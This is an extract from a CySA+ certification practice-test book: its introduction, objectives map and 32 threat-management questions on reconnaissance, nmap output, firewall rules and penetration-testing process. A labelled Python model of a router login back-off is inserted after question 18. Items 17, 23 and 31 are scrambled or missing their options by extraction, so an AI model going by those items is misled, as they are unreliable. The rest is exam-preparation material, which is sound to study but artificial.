Introduction


CompTIA CySA+ (Cybersecurity Analyst) Practice Tests is a companion volume to the
CompTIA CySA+ (Cybersecurity Analyst) Study Guide (Wiley, 2017, Chapple/Seidl). If
you're looking to test your knowledge before you take the CySA+ exam, this book will
help you by providing a combination of 1,000 questions that cover the CySA+ domains and
easy-to-understand explanations of both right and wrong answers.

If you’re just starting to prepare for the CySA+ exam, we highly recommend that you 
use the Cybersecurity Analyst+ (CySA+) Study Guide to help you learn about each of 
the domains covered by the CySA+ exam. Once you’re ready to test your knowledge, use 
this book to help find places where you may need to study more or to practice for the 
exam itself. 

Since this is a companion to the CySA+ Study Guide, this book is designed to be similar
to taking the CySA+ exam. It contains multipart scenarios as well as standard
multiple-choice questions similar to those you may encounter in the certification exam itself.

The book itself is broken up into 6 chapters: 4 domain-centric chapters with more than 
200 questions about each domain, and 2 chapters that contain 85-question practice tests 
to simulate taking the exam itself. 


CompTIA 


CompTIA is a nonprofit trade organization that offers certification in a variety of IT areas,
ranging from the skills that a PC support technician needs, which are covered in the A+
exam, to advanced certifications like the CompTIA Advanced Security Practitioner (CASP)
certification. CompTIA divides its exams into four different categories based on the skill
level required for the exam and what topics it covers, as shown here:


Foundational           Professional                 Specialty              Mastery
IT Fundamentals        A+                           CDIA+                  CASP
                       Cloud+ with Virtualization   CTT+
                       CySA+                        Cloud Essentials
                       Linux+                       Healthcare IT Tech
                       Mobility+
                       Network+
                       Security+
                       Project+
                       Server+
CompTIA recommends that practitioners follow the cybersecurity career path shown
here:


CompTIA IT Fundamentals -> CompTIA A+ -> CompTIA Network+ -> CompTIA Security+ -> CompTIA CySA+ -> CompTIA CASP





As you can see, the Cybersecurity Analyst+ certification fits into the Professional 
category, which is the same place you’ll find the popular A+, Network+, and Security+ 
credentials. Don’t let this fool you, however. The Cybersecurity Analyst+ exam is a more 
advanced exam, intended for professionals with hands-on experience and who possess the 
knowledge covered by the prior exams. 

CompTIA certifications are ISO and ANSI accredited, and they are used throughout 
multiple industries as a measure of technical skill and knowledge. In addition, CompTIA 
certifications, including the Security+ and the CASP, have been approved by the U.S. 
government as information assurance baseline certifications and are included in the State 
Department’s Skills Incentive Program. 


The Cybersecurity Analyst+ Exam 


The Cybersecurity Analyst+ exam, which CompTIA refers to as the CySA+, is designed to
be a vendor-neutral certification for cybersecurity, threat, and vulnerability analysts. The
CySA+ certification is designed for security analysts and engineers as well as security
operations center (SOC) staff, vulnerability analysts, and threat intelligence analysts. It focuses
on security analytics and practical use of security tools in real-world scenarios. It covers
four major domains: Threat Management, Vulnerability Management, Cyber Incident
Response, and Security Architecture and Tool Sets. These four areas include a range of
topics, from reconnaissance to incident response and forensics, while focusing heavily on
scenario-based learning.

The CySA+ exam fits between the entry-level Security+ exam and the CompTIA 
Advanced Security Practitioner (CASP) certification, providing a mid-career certification 
for those who are seeking the next step in their certification and career path. 

The CySA+ exam is conducted in a format that CompTIA calls “performance-based
assessment.” This means the exam uses hands-on simulations using actual security tools
and scenarios to perform tasks that match those found in the daily work of a security
practitioner. Exam questions may include multiple types of questions such as multiple-choice,
fill-in-the-blank, multiple-response, drag-and-drop, and image-based problems.

CompTIA recommends that test takers have three to four years of information
security-related experience before taking this exam. The exam costs $320 in the United
States, with roughly equivalent prices in other locations around the globe. You can find
more details about the CySA+ exam and how to take it at
https://certification.comptia.org/certifications/cybersecurity-analyst.


Study and Exam Preparation Tips 


We recommend you use this book in conjunction with the Cybersecurity Analyst+ (CySA+)
Study Guide. Read through chapters in the study guide and then try your hand at the
practice questions associated with each domain in this book.

You should also keep in mind that the CySA+ certification is designed to test practical
experience, so you should also make sure that you get some hands-on time with the
security tools covered on the exam. CompTIA recommends the use of NetWars-style
simulations, penetration testing and defensive cybersecurity simulations, and incident response
training to prepare for the CySA+.

Additional resources for hands-on exercises include the following: 


- Exploit-Exercises.com provides virtual machines, documentation, and challenges
  covering a wide range of security issues at https://exploit-exercises.com/.

- Hacking-Lab provides Capture the Flag (CTF) exercises in a variety of fields at
  https://www.hacking-lab.com/index.html.

- The OWASP Hacking Lab provides excellent web application focused exercises at
  https://www.owasp.org/index.php/OWASP_Hacking_Lab.

- PentesterLab provides subscription-based access to penetration testing exercises at
  https://www.pentesterlab.com/exercises/.

- The InfoSec Institute provides online capture-the-flag activities with bounties for
  written explanations of successful hacks at http://ctf.infosecinstitute.com/.
Since the exam uses scenario-based learning, expect the questions to involve analysis
and thought, rather than relying on simple memorization. The questions in this book are 
intended to help you be confident that you know the topic well enough to think through 
hands-on exercises. 


Taking the Exam 


Once you are fully prepared to take the exam, you can visit the CompTIA website to
purchase your exam voucher:


www.comptiastore.com/Articles.asp?ID=265&category=vouchers


CompTIA partners with Pearson VUE’s testing centers, so your next step will be to
locate a testing center near you. In the United States, you can do this based on your address
or your ZIP code, while non-U.S. test takers may find it easier to enter their city and
country. You can search for a test center near you at the Pearson VUE website, where you will
need to navigate to “Find a test center”:


www.pearsonvue.com/comptia/


Now that you know where you’d like to take the exam, simply set up a Pearson VUE
testing account and schedule an exam:


https://certification.comptia.org/testing/schedule-exam


On the day of the test, bring two forms of identification, and make sure to show up 
with plenty of time before the exam starts. Remember that you will not be able to take 
your notes, electronic devices (including smartphones and watches), or other materials in 
with you. 


After the Cybersecurity Analyst+ Exam 


Once you have taken the exam, you will be notified of your score immediately, so you’ll 
know if you passed the test right away. You should keep track of your score report with 
your exam registration records and the email address you used to register for the exam. 


Maintaining Your Certification 


CompTIA certifications must be renewed on a periodic basis. To renew your certification,
you can either pass the most current version of the exam, earn a qualifying higher-level
CompTIA or industry certification, or complete sufficient continuing education activities to
earn enough continuing education units (CEUs) to renew it.
CompTIA provides information on renewals via their website at:


https://certification.comptia.org/continuing-education/how-to-renew


When you sign up to renew your certification, you will be asked to agree to the CE
program’s Code of Ethics, to pay a renewal fee, and to submit the materials required for your
chosen renewal method.

You can find a full list of the industry certifications you can use to acquire CEUs toward
renewing the CySA+:


https://certification.comptia.org/continuing-education/renewothers/renewing-cysa


Using This Book to Practice 


This book is composed of six chapters. Each of the first four chapters covers a domain, 
with a variety of questions that can help you test your knowledge of real-world, scenario, 
and best practices—based security knowledge. The final two chapters are complete practice 
exams that can serve as timed practice tests to help determine whether you’re ready for the 
CySA+ exam. 

We recommend taking the first practice exam to help identify where you may need to 
spend more study time and then using the domain-specific chapters to test your domain 
knowledge where it is weak. Once you’re ready, take the second practice exam to make sure 
you’ve covered all the material and are ready to attempt the CySA+ exam. 

As you work through questions in this book, you will encounter tools and technology 
that you may not be familiar with. If you find that you are facing a consistent gap or that 
a domain is particularly challenging, we recommend spending some time with books and 
materials that tackle that domain in depth. This can help you fill in gaps and help you be 
more prepared for the exam. 
Objectives Map for CompTIA CySA+
(Cybersecurity Analyst) Exam CS0-001


The following objective map for the CompTIA CySA+ (Cybersecurity Analyst) certification 
exam will enable you to find where each objective is covered in the book. 


Objectives Map 


Objective (Chapter)


1.0 Threat Management


1.1 Given a scenario, apply environmental reconnaissance techniques using
appropriate tools and processes. (Chapter 1)


Procedures/common tasks including Topology discovery, OS fingerprinting, 
Service discovery, Packet capture, Log review, Router/firewall ACLs review, 
Email harvesting, Social media profiling, Social engineering, DNS harvesting, 
Phishing; Variables including Wireless vs. wired, virtual vs. physical, internal 
vs. external, and on-premises vs. cloud; Tools including NMAP, Host scanning, 
Network mapping, netstat, packet analyzers, IDS/IPS, HIDS/NIDS, Firewall 
rule-based and logs, Syslog, Vulnerability scanners 


1.2 Given a scenario, analyze the results of a network reconnaissance. (Chapter 1)


Point-in-time data analysis including Packet analysis, Protocol analysis, Traffic 
analysis, Netflow analysis, Wireless analysis; Data correlation and analytics 
including Anomaly analysis, Trend analysis, Availability analysis, Heuristic 
analysis, Behavioral analysis; Data output including Firewall logs, Packet 
captures, NMAP scan results, Event logs, Syslogs, IDS reports; Tools including 
SIEM, Packet analyzers, IDS/IPS, Resource monitoring tools, Netflow analyzer 


1.3 Given a network-based threat, implement or recommend the appropriate
response and countermeasure. (Chapter 1)


Network segmentation, system isolation, jump boxes and bastion hosts, 
Honeypots and honeynets, Endpoint security, Group policies, ACLs, Sinkholes, 
Hardening, Mandatory Access Control (MAC), Compensating controls, Blocking 
unused ports/services, Patching, Network Access Control (NAC) policies 
including time-based, rule-based, role-based, and location-based 
1.4 Explain the purpose of practices used to secure a corporate environment. (Chapter 1)


Penetration testing, Rules of engagement: timing, scope. Authorization,
exploitation, communication, and reporting. Reverse engineering,
Isolation/sandboxing, Hardware concerns including source authenticity of hardware,
trusted foundry, and OEM documentation. Software/malware,
Fingerprinting/hashing, Decomposition, Training and exercises, Red teams, Blue teams, and
White teams. Risk evaluation, Technical control review, Operational control
review, Technical impact and likelihood and rating: High, Medium, and Low


2.0 Vulnerability Management 


2.1 Given a scenario, implement an information security vulnerability
management process. (Chapter 2)


Identification of requirements, Regulatory environments, Corporate policy,
Data classification, Asset inventory including critical and non-critical
assets. Establishing scanning frequency based on risk appetite, regulatory
requirements, technical constraints, and workflow. Configure tools to perform
scans according to specification, Determining scanning criteria, setting
sensitivity levels, vulnerability feeds, scan scope, credentialed vs.
non-credentialed, types of data, and server-based vs. agent-based scanning. Tool
updates/plug-ins, SCAP, Permissions and access, How to execute scanning and
generate reports, Automated vs. manual distribution, remediation, prioritizing
response based on criticality and difficulty of implementation.
Communication/change control, Sandboxing/testing, Inhibitors to remediation: MOUs, SLAs,
organizational governance, business process interruption, and degrading
functionality. Ongoing scanning and continuous monitoring


2.2 Given a scenario, analyze the output resulting from a vulnerability scan. (Chapter 2)


Analyze reports from a vulnerability scan, Review and interpret scan results, 
Identify false positives, Identify exceptions, Prioritize response actions, 
Validate results and correlate other data points, Compare to best practices or 
compliance, Reconcile results, Review related logs and/or other data sources, 
Determine trends 


2.3 Compare and contrast common vulnerabilities found in the following
targets within an organization. (Chapter 2)


Servers, Endpoints, Network infrastructure, Network appliances, Virtual 
infrastructure, Virtual hosts, Virtual networks, Management interfaces, Mobile 
devices, Interconnected networks, Virtual private networks (VPNs), Industrial 
Control Systems (ICSs), SCADA devices 
3.0 Cyber Incident Response


3.1 Given a scenario, distinguish threat data or behavior to determine the
impact of an incident. (Chapter 3)


Threat classification: known threats vs. unknown threats, Zero day, and
advanced persistent threats. Factors contributing to incident severity and
prioritization: scope of impact, downtime, recovery time, data integrity,
economic impact, system process criticality. Types of data: Personally
Identifiable Information (PII), Personal Health Information (PHI), payment card
information, intellectual property, corporate confidential, accounting data,
mergers and acquisitions


3.2 Given a scenario, prepare a toolkit and use appropriate forensics tools
during an investigation. (Chapter 3)


Forensics kits, Digital forensics workstations, Write blockers, Cables, Drive
adapters, Wiped removable media, Cameras, Crime tape, Tamper-proof seals,
Documentation/forms, Chain of custody forms, Incident response plan, Incident
forms, Call list/escalation lists. Forensic investigation suites, Imaging utilities,
Analysis utilities, Chain of custody, Hashing utilities, OS and process analysis,
Mobile device forensics, Password crackers, Cryptography tools, Log viewers


3.3 Explain the importance of communication during the incident response
process. (Chapter 3)


Stakeholders: HR, legal, marketing, and management. Purpose of
communication processes: Limiting communication to trusted parties,
disclosure based on regulatory/legislative requirements, Preventing
inadvertent release of information, secure method of communication.
Role-based responsibilities: technical, management, law enforcement, and retaining
an incident response provider


3.4 Given a scenario, analyze common symptoms to select the best course of
action to support incident response. (Chapter 3)


Common network-related symptoms: bandwidth consumption, beaconing, 
irregular peer-to-peer communication, rogue devices on the network, scan 
sweeps, and unusual traffic spikes. Common host-related symptoms: processor 
(CPU) consumption, memory consumption, drive capacity consumption, 
unauthorized software, malicious processes, unauthorized changes, 
unauthorized privileges, data exfiltration. Common application-related 
symptoms: anomalous activity, introduction of new accounts, unexpected 
output, unexpected outbound communication, service interruption, memory 
overflows 
3.5 Summarize the incident recovery and post-incident response process. (Chapter 3)


Containment techniques: segmentation, isolation, removal, and reverse
engineering. Eradication techniques: sanitization, reconstruction/reimage,
secure disposal, validation, patching, permissions, scanning, and verifying
logging/communication to security monitoring. Corrective actions, Lessons
learned reports, Change control process, Updating incident response plans,
Incident summary reports


4.0 Security Architecture and Tool Sets


4.1 Explain the relationship between frameworks, common policies, controls,
and procedures. (Chapter 4)


Regulatory compliance, Frameworks: NIST, ISO, COBIT, SABSA, TOGAF,
ITIL. Policies: password policy, acceptable use policy, data ownership policy,
data retention policy, account management policy, and data classification
policies. Controls, Control selection based on criteria, Organizationally
defined parameters, Physical controls, Logical controls, Administrative
controls, Procedures: continuous monitoring, evidence production, patching,
compensating control development, control testing procedures, managing
exceptions, developing and executing remediation plans. Verifications
and quality control, Audits, Evaluations, Assessments, Maturity models,
Certification


4.2 Given a scenario, use data to recommend remediation of security issues
related to identity and access management. (Chapter 4)


Security issues associated with context-based authentication based on time,
location, frequency, behavioral patterns. Security issues associated with
identities: personnel, endpoints, servers, services, roles, applications. Security
issues associated with identity repositories, Directory services, TACACS+,
RADIUS, Security issues associated with federation and single sign-on:
Manual vs. automatic provisioning/deprovisioning and self-service password
reset. Exploits: impersonation, man-in-the-middle attacks, session hijacking,
cross-site scripting, privilege escalation, and rootkits.


4.3 Given a scenario, review security architecture and make recommendations
to implement compensating controls. (Chapter 4)


Security data analytics using data aggregation and correlation, trend analysis,
and historical analysis. Manual review of firewall logs, syslogs, authentication
logs, and event logs. Defense in depth concepts. Personnel security: training,
dual control, separation of duties, third party/consultants, cross training,
mandatory vacation, succession planning. Defense in depth related processes:
continual improvement, scheduled reviews, and retirement of processes.
Technologies: automated reporting, security appliances, security suites,
outsourcing, Security as a Service (SaaS), and cryptography. Other security
concepts: network design and network segmentation


4.4 Given a scenario, use application security best practices while participating
in the Software Development Life Cycle (SDLC). (Chapter 4)


Best practices during software development, Security requirements definition, 
Security testing phases, Static code analysis, Web app vulnerability scanning, 
Fuzzing, Use of interception proxies to crawl applications, Manual peer reviews, 
User acceptance testing, Stress testing applications, Security regression 
testing, Input validation, Secure coding best practices from OWASP, SANS, 
Center for Internet Security. System design recommendations and benchmarks 


4.5 Compare and contrast the general purpose and reasons for using various
cybersecurity tools and technologies. (Chapter 4)


Preventative tools, including IPS: Sourcefire, Snort, Bro, HIPS, Firewalls: Cisco, 
Palo Alto, Check Point. Antivirus and Anti-malware, EMET, Web proxies, Web 
Application Firewall (WAF) systems: ModSecurity, NAXSI, Imperva. 


Collective tools, including SIEMs: ArcSight, QRadar, Splunk, AlienVault, OSSIM,
Kiwi Syslog. Network scanning tool with NMAP, Vulnerability scanning using
Qualys, Nessus, OpenVAS, Nexpose, Nikto, and the Microsoft Baseline Security
Analyzer. Packet capture using Wireshark, tcpdump, Network General,
and Aircrack-ng. Command line/IP utilities: netstat, ping, tracert/traceroute,
ipconfig/ifconfig, nslookup/dig, the Sysinternals suite, OpenSSL. IDS/HIDS: Bro.


Analytical tools, including Vulnerability scanning including Qualys, Nessus, 
OpenVAS, Nexpose, Nikto, and the Microsoft Baseline Security Analyzer. 
Monitoring tools: MRTG, Nagios, SolarWinds, Cacti, NetFlow Analyzer. 
Interception proxies: Burp Suite, Zap, and Vega. 


Exploit tools, including Interception proxies: Burp Suite, Zap, and Vega.
Exploit framework: Metasploit and Nexpose. Fuzzers: Untidy, Peach Fuzzer,
Microsoft SDL File/Regex Fuzzer.


Forensics tools, including Forensic suites: EnCase, FTK, Helix, Sysinternals, and
Cellebrite. Hashing tools: MD5sum, SHAsum. Password cracking tools: John
the Ripper, Cain & Abel. Imaging using DD
Chapter 1: Domain 1: Threat Management


EXAM OBJECTIVES COVERED IN THIS CHAPTER:


✓ 1.1 Given a scenario, apply environmental reconnaissance techniques using
appropriate tools and processes.

  - Procedures/common tasks
  - Variables
  - Tools


✓ 1.2 Given a scenario, analyze the results of a network reconnaissance.

  - Point-in-time data analysis
  - Data correlation and analytics
  - Data output
  - Tools


✓ 1.3 Given a network-based threat, implement or recommend the appropriate
response and countermeasure.

  - Network segmentation
  - Honeypot
  - Endpoint security
  - Group policies
  - ACLs
  - Hardening
  - Network Access Control (NAC)


✓ 1.4 Explain the purpose of practices used to secure a corporate environment.

  - Penetration testing
  - Reverse engineering
  - Training and exercises
  - Risk evaluation
1. Charles wants to use active discovery techniques as part of his reconnaissance efforts.
Which of the following techniques fits his criteria?


A. Google searching 

B. Using a Shodan search 

C. Using DNS reverse lookup 

D. Querying a PGP key server 

2. During the reconnaissance stage of a penetration test, Cynthia needs to gather information
about the target organization’s network infrastructure without causing an IPS to alert the
target to her information gathering. Which of the following is her best option?


A. Perform a DNS brute-force attack.

B. Use an nmap ping sweep.

C. Perform a DNS zone transfer.

D. Use an nmap stealth scan.

3. Tiffany needs to assess the patch level of a Windows 2012 server and wants to use a freely
available tool to check the system for security issues. Which of the following tools will
provide the most detail about specific patches installed or missing from her machine?


A. nmap

B. Nessus

C. MBSA

D. Metasploit


4. Charleen is preparing to conduct a scheduled reconnaissance effort against a client site.
Which of the following is not typically part of the rules of engagement that are agreed to
with a client for a reconnaissance effort?


A. Timing

B. Scope

C. Exploitation methods

D. Authorization


5. A port scan of a remote system shows that port 3306 is open on a remote database server.
What database is the server most likely running?


A. Oracle

B. Postgres

C. MySQL

D. Microsoft SQL

6. Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of
detection method should she look for in her selected tool?


A. Signature based

B. Heuristic based

C. Trend based

D. Availability based
7. During a port scan of her network, Cynthia discovers a workstation that shows the following
ports open. What should her next action be?


Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-25 21:08 EDT
Nmap scan report for deptsrv (192.168.2.22)
Host is up (0.00023s latency).
Not shown: 65524 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
7680/tcp  open  unknown
49677/tcp open  unknown
MAC Address: AD:5F:F4:7B:4B:7D (Intel Corporation)

Nmap done: 1 IP address (1 host up) scanned in 105.78 seconds


A. Determine the reason for the ports being open.

B. Investigate the potentially compromised workstation.

C. Run a vulnerability scan to identify vulnerable services.

D. Reenable the workstation’s local host firewall.

8. Charles wants to provide additional security for his web application that currently stores
passwords in plain text in a database. Which of the following options is his best option to
prevent theft of the database from resulting in exposed passwords?


A. Encrypt the database of plain-text passwords.

B. Use MD5 and a salt.

C. Use SHA-1 and a salt.

D. Use bcrypt.


9. Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from
hosts A and B, while allowing SMTP traffic from host C. Which set of the following
commands will accomplish this?


[Diagram: Destination Host, IP address 192.168.2.11; Host A, IP address 10.1.1.170;
Host B, IP address 10.2.0.134; Host C, IP address 10.2.0.130]


A. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
   # iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP
   # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW

B. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
   # iptables -I INPUT 2 -s 10.2.0.134 -j DROP
   # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW

C. # iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW
   # iptables -I INPUT 2 -s 10.2.0.134 -j ALLOW
   # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP

D. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
   # iptables -I INPUT 2 -s 10.2.0.134 -j DROP
   # iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW


10. After filling out the scoping document for a penetration test, including details of what
tools, techniques, and targets are included in the test, what is the next step that Jessica
needs to take to conduct the test?


A. Port scan the target systems.

B. Get sign-off on the document.

C. Begin passive fingerprinting.

D. Notify local law enforcement.


11. Brian’s penetration testing efforts have resulted in him successfully gaining access to a
target system. Using the diagram shown here, identify what step occurs at point B in the
NIST SP800-115 process flow.


[Diagram labels: Discovery, Vulnerability scanning, Gaining Access, Escalating privileges,
System Browsing, Install Additional Tools, Pivoting]


12. Chris wants to prevent remote login attacks against the root account on a Linux system.
What method will stop attacks like this while allowing normal users to use ssh?


A. Add an iptables rule blocking root logins.

B. Add root to the sudoers group.

C. Change sshd_config to deny root login.

D. Add a network IPS rule to block root logins.


13. What term is often used for attackers during a penetration test?

A. Black team

B. Blue team

C. Red team

D. Green team

14. Charles uses the following command while investigating a Windows workstation used by
his organization’s vice president of finance who only works during normal business hours.
Charles believes that the workstation has been used without permission by members of his
organization’s cleaning staff after-hours. What does he know if the user ID shown is the
only user ID able to log into the system, and he is investigating on August 12, 2017?


C:\Users\bigfish>wmic netlogin get name, Lastlogon,badpasswordcount
BadPasswordCount  LastLogon                  Name
                                             NT AUTHORITY\SYSTEM
0                 20170811203748.000000-240  Finance\bigfish


A. The account has been compromised.

B. No logins have occurred.

C. The last login was during business hours.

D. Charles cannot make any determinations from this information.

15. Lauren’s honeynet, shown here, is configured to use a segment of unused network space
that has no legitimate servers in it. What type of threats is this design particularly useful
for detecting?


[Diagram: Border Router; Firewall or Unified Security Device; Honeynet; Internal Trusted Zone]


A. Zero-day attacks

B. SQL injection

C. Network scans

D. DDoS attacks
16. Angela is designing her organization’s data center network and wants to establish a secure
zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage
systems in the DMZ are easily auditable and that all access can be logged while helping
prevent negative impacts from compromised or infected workstations, which of the following
solutions is Angela’s best design option?


A. Administrative virtual machines run on administrator workstations

B. A jump host

C. A bastion host

D. Use ssh or RDP from administrative workstations


17. Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the netflow shown here?

Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2017-07-11 14:39:30.606 0.448 TCP 192.168.2.1:1451->10.2.3.1:443 10 1510 1
2017-07-11 14:39:30.826 0.448 TCP 10.2.3.1:443->192.168.2.1:1451 7 360 1
2017-07-11 14:45:32.495 18.492 TCP 10.6.2.4:443->192.168.2.1:1496 5 1107 1
2017-07-11 14:45:32.255 18.888 TCP 192.168.2.1:1496->10.6.2.4:443 11 1840 1
2017-07-11 14:46:54.983 0.000 TCP 192.168.2.1:1496->10.6.2.4:443 1 49 1
2008-12-09 16:45:34.764 0.362 TCP 10.6.2.4:443->192.168.2.1:4292 4 1392 1
2008-12-09 16:45:37.516 0.676 TCP 192.168.2.1:4292->10.6.2.4:443 4 462 1
2008-12-09 16:46:38.028 0.000 TCP 192.168.2.1:4292->10.6.2.4:443 2 89 1
2017-07-11 14:45:23.811 0.454 TCP 192.168.2.1:1515->10.6.2.5:443 4 263 1
2017-07-11 14:45:28.879 1.638 TCP 192.168.2.1:1505->10.6.2.5:443 18 2932 1
2017-07-11 14:45:29.087 2.288 TCP 10.6.2.5:443->192.168.2.1:1505 31 48125 1
2017-07-11 14:45:54.027 0.224 TCP 10.6.2.5:443->192.168.2.1:1515 2 1256 1
2017-07-11 14:45:58.551 4.328 TCP 192.168.2.1:1525->10.6.2.5:443 10 648 1
2017-07-11 14:45:58.759 0.920 TCP 10.6.2.5:443->192.168.2.1:1525 12 15792 1
2017-07-11 14:46:32.227 14.796 TCP 192.168.2.1:1525->10.8.2.5:443 31 1700 1
2017-07-11 14:46:52.983 0.000 TCP 192.168.2.1:1505->10.8.2.5:443 1 40 1
A.
B.
C.
D.

Chapter 1 = Domain 1: Threat Management 


18. Rick is auditing a Cisco router configuration and notes the following line:
login block-for 120 attempts 5 within 60


What type of setting has been enabled? 

A. A DDoS prevention setting 

B. A back-off setting 

C. A telnet security setting 

D. An autologin prevention setting 
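The semantics of that line matter when reading the syslog events it produces, so here is the policy modelled in Python. This is an added example, not code from the original page or from Cisco: it keeps a sliding window of failed logins and enters a quiet period of block-for seconds once the attempt count is reached within the window, which is the behaviour the command configures. Timestamps are passed in as seconds so the model can be driven deterministically.

```python
"""Model of a login back-off policy such as
`login block-for 120 attempts 5 within 60`.

Added example (not from the original page): failed logins are kept in a
sliding window; reaching `attempts` failures within `within` seconds
starts a quiet period of `block_for` seconds during which attempts are
rejected without being counted.
"""
from collections import deque


class LoginBackoff:
    def __init__(self, block_for=120, attempts=5, within=60):
        self.block_for = block_for
        self.attempts = attempts
        self.within = within
        self._failures = deque()   # timestamps of failures inside the window
        self.blocked_until = None  # end of the current quiet period, if any

    def is_blocked(self, now):
        """True while in quiet mode; leaving quiet mode resets the failure window."""
        if self.blocked_until is not None and now < self.blocked_until:
            return True
        if self.blocked_until is not None:
            self.blocked_until = None
            self._failures.clear()
        return False

    def record_failure(self, now):
        """Register a failed login; return True if this failure starts a quiet period."""
        if self.is_blocked(now):
            return False
        self._failures.append(now)
        # drop failures that fell out of the `within` window
        while self._failures and now - self._failures[0] > self.within:
            self._failures.popleft()
        if len(self._failures) >= self.attempts:
            self.blocked_until = now + self.block_for
            return True
        return False

    def record_success(self, now):
        """A successful login is only accepted outside quiet mode; it clears the window."""
        if self.is_blocked(now):
            return False
        self._failures.clear()
        return True


if __name__ == "__main__":
    policy = LoginBackoff()
    for t in (0, 10, 20, 30, 40):
        print(f"t={t:3}s failure -> quiet mode starts: {policy.record_failure(t)}")
    print("t= 41s blocked:", policy.is_blocked(41))
    print("t=160s blocked:", policy.is_blocked(160))
```

Five failures spread more than 60 seconds apart never trigger the block, which is why the setting is a back-off against brute force rather than a hard lockout.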

19. As a U.S. government employee, Michael is required to ensure that the network devices that he procures have a verified chain of custody for every chip and component that goes into them. What is this program known as?


A. Gray market procurement 

B. Trusted Foundry 

C. White market procurement 

D. Chain of Procurement 

20. During a network reconnaissance exercise, Chris gains access to a PC located in a secure network. If Chris wants to locate database and web servers that the company uses, what command-line tool can he use to gather information about other systems on the local network without installing additional tools or sending additional traffic?


A. ping 

B. traceroute 
C. nmap 

D. netstat 


21. Alice is conducting a penetration test of a client’s systems. As part of her test, she gathers 
information from the social media feeds of staff members who work for her client. What 
phase of the NIST penetration testing process is she currently in? 


A. Social engineering 
B. Discovery 
C. Analysis 


D. Social media profiling 


22. What is the default nmap scan type when nmap is not provided with a scan type flag? 
A. A TCP FIN scan 

B. A TCP connect scan 

C. A TCP SYN scan 

D. A UDP scan 
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23. Isaac wants to grab the banner from a remote web server using commonly available tools. 
Which of the following tools cannot be used to grab the banner from the remote host? 


24. 


25. 


26. 


A. 
B. 
C. 
D. 


netcat 
telnet 
wget 
ftp 


24. Charles wants to limit what potential attackers can gather during passive or semipassive reconnaissance activities. Which of the following actions will typically reduce his organization’s footprint the most?

A. Limit information available via the organizational website without authentication.
B. Use a secure domain registration.
C. Limit technology references in job postings.
D. Purge all document metadata before posting.


25. Cassandra’s nmap scan of an open wireless network (192.168.1.0/24) shows the following host at IP address 192.168.1.1. Which of the following is most likely to be the type of system at that IP address based on the scan results shown?

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         Dropbear sshd 2016.74 (protocol 2.0)
53/tcp   open  domain      dnsmasq 2.76
80/tcp   open  http        Acme milli_httpd 2.0 (ASUS RT-AC-series router)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
515/tcp  open  tcpwrapped
1723/tcp open  pptp        linux (Firmware: 1)
8200/tcp open  upnp        MiniDLNA 1.1.5 (OS: 378.xx; DLNADOC 1.50; UPnP 1.0)
8443/tcp open  ssl/http    Acme milli_httpd 2.0 (ASUS RT-AC-series router)
9100/tcp open  jetdirect?
9998/tcp open  tcpwrapped
Device type: bridge|general purpose

A. A virtual machine
B. A wireless router
C. A broadband router
D. A print server


26. While reviewing Shodan scan data for his organization, John notices the following entry. Which of the following is false?

10001/tcp  automated-tank-gauge
[Please try to use SSHv1 for your sessions to avoid transmitting passwords in the clear over the net.]
console.transsys.com --- UNAUTHORIZED ACCESS PROHIBITED. GO AWAY. ---

User Access Verification

Username:

A. The device allows telnet connections.
B. There is a console port on a nonstandard port.
C. The device requires sshv1.
D. The device is an automated tank gauge.


27. Lauren has local access to a Windows workstation and wants to gather information about 
the organization that it belongs to. What type of information can she gain if she executes 
the command nbtstat -c? 


A. MAC addresses and IP addresses of local systems 

B. NetBIOS name-to-IP address mappings 

C. A list of all NetBIOS systems that the host is connected to 
D. NetBIOS MAC-to-IP address mappings 


28. Tracy believes that a historic version of her target’s website may contain data she needs for her reconnaissance. What tool can she use to review snapshots of the website from multiple points in time?


A. Time Machine 
B. Morlock 
C. Wayback Machine 
D. Her target’s web cache 
29. After Kristen received a copy of an nmap scan run by a penetration tester that her company hired, she knows that the tester used the -O flag. What type of information should she expect to see included in the output other than open ports?


A. OCMP status 

B. Other ports 

C. Objective port assessment data in verbose mode 

D. Operating system and Common Platform Enumeration (CPE) data 


30. Andrea wants to conduct a passive footprinting exercise against a target company. Which 
of the following techniques is not suited to a passive footprinting process? 


A. WHOIS lookups 
B. Banner grabbing 
C. BGP looking glass usage 
D. Registrar checks 
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31. While gathering reconnaissance data for a penetration test, Charleen uses the MxToolbox 
MX Lookup tool. What can she determine from the response to her query shown here? 


32. 


Pref Hostname 


10 cluster1.us.messagelabs.com 


20 cluster1a.us.messagelabs.com 


Test 


DNS Record Published 


Your email service provider is “MessageLabs” 


A 
B. 
C 
D 


IP Address TTL 


216.82.241.131 

E New York US 
MessageLabs Inc. (AS26282) 
216.82.251.230 

Ms New York US 
MessageLabs Inc. (AS26282) 


15 min Blacklist Check 


15 min Blacklist Check 


Result 


DNS Record found 


Need Bulk Email Provider Data? 





The mail servers are blacklisted. 

The mail servers have failed an SMTP test. 
The mail servers are clustered. 

There are two MX hosts listed in DNS. 


SMTP Test 


SMTP Test 


32. Alex wants to scan a protected network and has gained access to a system that can communicate to both his scanning system and the internal network, as shown in the image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A?

